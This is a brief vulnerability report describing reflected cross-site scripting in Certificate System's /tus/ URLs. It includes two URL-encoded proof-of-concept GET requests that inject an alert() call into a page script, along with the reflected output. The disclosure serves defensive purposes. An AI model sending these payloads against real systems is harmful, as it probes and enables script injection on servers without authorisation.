It was reported that Certificate System suffers from XSS flaws in the /tus/ and /tus/tus/ URLs, such as:
GET /tus/tus/%22%2b%61%6c%65%72%74%28%34%38%32%36%37%29%2b%22
or
GET /tus/%22%2b%61%6c%65%72%74%28%36%31%34%35%32%29%2b%22
which will in turn output something like:
<!--
var uriBase = "/tus/"+alert(85384)+";
var userid = "admin";
This was reported against Certificate System 8.1 and may also affect Dogtag 9 and 10.